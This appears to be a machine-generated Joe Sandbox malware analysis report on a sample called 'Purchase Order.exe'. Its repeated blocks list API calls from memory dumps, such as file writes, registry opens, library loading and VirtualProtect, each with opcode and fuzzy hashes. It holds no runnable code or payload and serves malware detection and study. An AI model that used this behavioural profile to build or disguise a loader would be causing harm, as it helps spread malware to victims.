                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll
                                                                                                  • API String ID: 1659193697-869971619
                                                                                                  • Opcode ID: 9108d4ceed508d8a02313cc574e378f3b7a987aa5820872456f395d40ec67233
                                                                                                  • Instruction ID: 2bf8431ce51e6c58f43ec2947d6bdc143d6e81ddf8616a76c722d5425931f27b
                                                                                                  • Opcode Fuzzy Hash: 9108d4ceed508d8a02313cc574e378f3b7a987aa5820872456f395d40ec67233
                                                                                                  • Instruction Fuzzy Hash: 82F0E272A08244BACB20FBB55E4AA9F6AA4CBC1314B34403FF141B71C2C6BC4542DA2D
                                                                                                  APIs
                                                                                                  • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                                                                  • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStringslstrcmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1938659011-0
                                                                                                  • Opcode ID: 99ff6f7ebc29e3294f0bf96d9ec24245debac9b57580bca197066bfebfa759a6
                                                                                                  • Instruction ID: ab1dd0d9c5eb94bf9ce54f5104db011015230574e834771f483328ebd508fd9c
                                                                                                  • Opcode Fuzzy Hash: 99ff6f7ebc29e3294f0bf96d9ec24245debac9b57580bca197066bfebfa759a6
                                                                                                  • Instruction Fuzzy Hash: 9DF08271B05241EBCB20DF659D45A9B7FE8EFD1394B10843BE145F6190D2388541DA69
                                                                                                  APIs
                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E43
                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E4E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$EnableShow
                                                                                                  • String ID:
                                                                                                  • API String ID: 1136574915-0
                                                                                                  • Opcode ID: 36dcea6e1d224af34142dbcc53fa3142b8bf20b1b5b4f1e3402a8bbf529d307d
                                                                                                  • Instruction ID: 6bc854546bde8c1d97c50108fc272036e6fafce41083740c3c393c21766323e0
                                                                                                  • Opcode Fuzzy Hash: 36dcea6e1d224af34142dbcc53fa3142b8bf20b1b5b4f1e3402a8bbf529d307d
                                                                                                  • Instruction Fuzzy Hash: 2BE012B2B08211BFEB14EFB4E9895AE7BB4EF40325B20403BE401F11D1D67D59419B59
                                                                                                  APIs
                                                                                                  • ShowWindow.USER32(00000000), ref: 00401581
                                                                                                  • ShowWindow.USER32(0001043C), ref: 00401596
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ShowWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 1268545403-0
                                                                                                  • Opcode ID: 17699a1f730cc25233c13bc64813f1e04f0aaa057b5d2da36e90e35cf9de59ca
                                                                                                  • Instruction ID: 1fba713723e617fd63a9d4476e2d2033a2576266d828a69d52802257caf8ad67
                                                                                                  • Opcode Fuzzy Hash: 17699a1f730cc25233c13bc64813f1e04f0aaa057b5d2da36e90e35cf9de59ca
                                                                                                  • Instruction Fuzzy Hash: 42E086B6B00115BBCB24DF64EE9087E77B6E784320750043FD502B3290C2B69D429B58
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004062BD
                                                                                                    • Part of subcall function 00406222: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406239
                                                                                                    • Part of subcall function 00406222: wsprintfA.USER32 ref: 00406272
                                                                                                    • Part of subcall function 00406222: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406286
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 2547128583-0
                                                                                                  • Opcode ID: 3d400e748f947671e30b9badb510484ff95b6787d133025eb2c4a7967b05848e
                                                                                                  • Instruction ID: 9986063a3a3a914c3c9c85809e338cef1f66889ba2e3f6f8a6abe9a53671474f
                                                                                                  • Opcode Fuzzy Hash: 3d400e748f947671e30b9badb510484ff95b6787d133025eb2c4a7967b05848e
                                                                                                  • Instruction Fuzzy Hash: BAE0CD32A08111B7D650B7705D0497773AC9FC475030208BEF907F2185E738EC319769
                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402D8D,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 00405B6E
                                                                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesCreate
                                                                                                  • String ID:
                                                                                                  • API String ID: 415043291-0
                                                                                                  • Opcode ID: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
                                                                                                  • Instruction ID: 2e597581bf20324382b204af2e2b9293bc3b27f4d9e8cb915424ec39c2be7a6e
                                                                                                  • Opcode Fuzzy Hash: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
                                                                                                  • Instruction Fuzzy Hash: A7D09E31658201EFFF098F20DD16F2EBBA2EB84B00F10962CBA92941E0D6755815DB26
                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNELBASE(?,?,0040575D,?,?,00000000,00405940,?,?,?,?), ref: 00405B4A
                                                                                                  • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B5E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                                  • Instruction ID: 899457fb2a373ec916eabf998b05f3716e4ca5246c779d0db29ba2cd27af7bf6
                                                                                                  • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                                  • Instruction Fuzzy Hash: E2D01272908521AFC6102738ED0C89BBF65EB543717058B31FDB9E22F0D7345C528AA9
                                                                                                  APIs
                                                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,004032B2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 00405659
                                                                                                  • GetLastError.KERNEL32 ref: 00405667
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1375471231-0
                                                                                                  • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                                  • Instruction ID: 0da22567c4b446b4f42a21ca14333010da7ca755278e2de90fea66cf95c641d8
                                                                                                  • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                                  • Instruction Fuzzy Hash: 80C04C30A19502DAD7105B31DD08F177E60EB50741F548935A10AE11F0D6769451DD3F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wsprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 2111968516-0
                                                                                                  • Opcode ID: ba0784285b27e5103b764f78ef6fb10791d77067d667a4e03e7b1a8b22abeba3
                                                                                                  • Instruction ID: c506eed3d8509f523d62ce86bbd7ec2d7c700efff23c78fc82727488f7f797df
                                                                                                  • Opcode Fuzzy Hash: ba0784285b27e5103b764f78ef6fb10791d77067d667a4e03e7b1a8b22abeba3
                                                                                                  • Instruction Fuzzy Hash: 5A21F970D0429ABADF218FA885486AEBF749F01314F1445BFE890B63D1C1BE8A81CF59
                                                                                                  APIs
                                                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileMove
                                                                                                  • String ID:
                                                                                                  • API String ID: 3562171763-0
                                                                                                  • Opcode ID: 6a883f9504f5c2888ca71b0d8159a7984c3ca00eae0cacb2c6aae2654bc04831
                                                                                                  • Instruction ID: 5898f67605d89fe4fb30f7e570565f9f0960a3a70fe6e37fe1d860f2248c6c53
                                                                                                  • Opcode Fuzzy Hash: 6a883f9504f5c2888ca71b0d8159a7984c3ca00eae0cacb2c6aae2654bc04831
                                                                                                  • Instruction Fuzzy Hash: 2AF09635B08115A6DB20A7A54F0DD5F15649B81364B34423BF151B21D1DABD860295AF
                                                                                                  APIs
                                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfileStringWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 390214022-0
                                                                                                  • Opcode ID: 6b5e48cc008279052f1a47b51cc32cf127a00dc2733201354761e156b3ebbbdf
                                                                                                  • Instruction ID: 5f6267e841dd840bf6295cbe1617e7a0042591bb1814ca2e8a4844537e2a2c78
                                                                                                  • Opcode Fuzzy Hash: 6b5e48cc008279052f1a47b51cc32cf127a00dc2733201354761e156b3ebbbdf
                                                                                                  • Instruction Fuzzy Hash: 67E04F31B001246BD7307AB10F8E97F10999BC4304B39153ABA01B62C6EDBC4C414AB9
                                                                                                  APIs
                                                                                                  • WriteFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,0040F5D9,0040A8D8,004031F8,0040A8D8,0040F5D9,004128D8,00004000,?,00000000,00403022,00000004), ref: 00405C25
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3934441357-0
                                                                                                  • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                  • Instruction ID: a68fbbb5dd244fa7f7e93bb3aa8c49248ed304819acaaafe9587b6e0b9a7c414
                                                                                                  • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                  • Instruction Fuzzy Hash: 59E0EC3261835EAFEF209E659C00AEB7B6CEB05361F048836FD15E2150D271E8219BA9
                                                                                                  APIs
                                                                                                  • RegOpenKeyExA.KERNELBASE(00000000,000004B9,00000000,00000022,00000000,?,?), ref: 00402C00
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Open
                                                                                                  • String ID:
                                                                                                  • API String ID: 71445658-0
                                                                                                  • Opcode ID: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                                                                  • Instruction ID: e7f2061ded5818062db825bc0413707355dbbb7a887edde82a058a89c260750b
                                                                                                  • Opcode Fuzzy Hash: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                                                                  • Instruction Fuzzy Hash: 5EE046B6250108BADB00EFA4EE4AFA537ECAB44700F008021B608E60A1C678E6108B79
                                                                                                  APIs
                                                                                                  • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128D8,0040A8D8,00403274,00409130,00409130,00403178,004128D8,00004000,?,00000000,00403022), ref: 00405BF6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2738559852-0
                                                                                                  • Opcode ID: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
                                                                                                  • Instruction ID: ff987474db4941a2a63fe891919fb2946ba1e32a0df937fa27738628adbeee07
                                                                                                  • Opcode Fuzzy Hash: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
                                                                                                  • Instruction Fuzzy Hash: 5EE0EC3261835AABEF509E559C04EEB7B6CFB05360F045432FD15E2190D275E8219BA5
                                                                                                  APIs
                                                                                                  • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2762281649.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2762228322.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762310776.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762334808.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                  • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                                                  • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                  • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                                                                  APIs
                                                                                                  • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402369
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
